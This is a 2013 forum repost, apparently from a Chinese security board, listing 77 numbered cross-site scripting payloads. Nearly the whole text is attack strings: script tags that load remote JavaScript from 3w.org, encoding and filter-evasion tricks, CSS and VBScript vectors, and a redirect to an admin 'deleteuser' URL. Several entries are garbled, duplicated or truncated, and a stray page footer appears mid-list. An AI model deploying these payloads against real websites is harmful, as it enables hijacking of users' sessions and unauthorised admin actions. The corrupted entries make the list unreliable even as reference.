XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems t00ls doesn't have much material on XSS, so when I saw something good I copied it over; maybe some of you will want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolon required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed (defective) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters basically have no effect here in China, because there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double opening angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an opening angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14